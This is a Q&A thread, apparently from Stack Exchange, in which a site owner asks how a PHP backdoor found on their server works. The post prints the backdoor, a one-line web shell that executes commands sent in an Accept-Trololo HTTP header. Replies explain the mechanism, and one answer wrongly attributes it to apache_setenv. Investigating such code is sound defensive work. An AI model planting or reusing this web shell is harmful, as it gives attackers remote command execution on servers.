1

I've found a php backdoor on my host.

<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>

I see requests in access log to that php file were POST requests, but I don't know how the SETENV of that variable was set; could someone explain how such variable can be set and if possible where can I limit/disable setting such variables on server side.

thanks

-H.

Hrvoje Špoljar
  • 5,245
  • 26
  • 42
  • Are you merely investigating this, or do you need to close a security hole by patching the code? – outis Jul 22 '11 at 01:43
  • @Hrvoje - sorry, this question should never have been migrated here. This is a question about php and security, so if it belongs anywhere on the network it would be at security.se – Mark Henderson Jul 22 '11 at 02:13
  • im investigating yes; trying to understand how things work; I've put it to coders site but they moved it to server fault ... gah – Hrvoje Špoljar Jul 22 '11 at 10:43
  • 1
    HTTP_ACCEPT_TROLOLO is automatically set by PHP & apache if there's an Accept-Trololo header. you may detect this header for removal with mod-security but the real problem is the presence of the PHP script (as another legacy header could be used) – regilero Jul 22 '11 at 15:59

1 Answers1

1

it was set by apache_setenv();

Search for

apache_setenv("HTTP_ACCEPT_TROL

or

apache_setenv('HTTP_ACCEPT_TROL

and you'll find your answer

genesis
  • 343
  • 4
  • 15
  • that may be so; but I see now way how that could be done remotely; hence what is use of backdoor if you can't use it remotely? – Hrvoje Špoljar Jul 22 '11 at 00:34
  • " and ' ... it can be both – genesis Jul 22 '11 at 00:35
  • you would maybe get way by telling us that apache env – genesis Jul 22 '11 at 00:36
  • This question is clearly off topic (it's not programming related in any sense and belongs on serverfault). Please don't answer such questions; it encourages others to post similar off topic questions and clutters the site, making it less effective as a resource. With 5K+ rep, you should be familiar with what's on topic and what's not; if you're not, please read the [FAQ](http://stackoverflow.com/faq) so that you are more so. Thanks. :) –  Jul 22 '11 at 00:36
  • 1
    @KenWhite: His question contains PHP code, and it maybe does (not necessary though) belongs to serverfault. It could be just phpcode, or server-side implemention. Nobody knows – genesis Jul 22 '11 at 00:38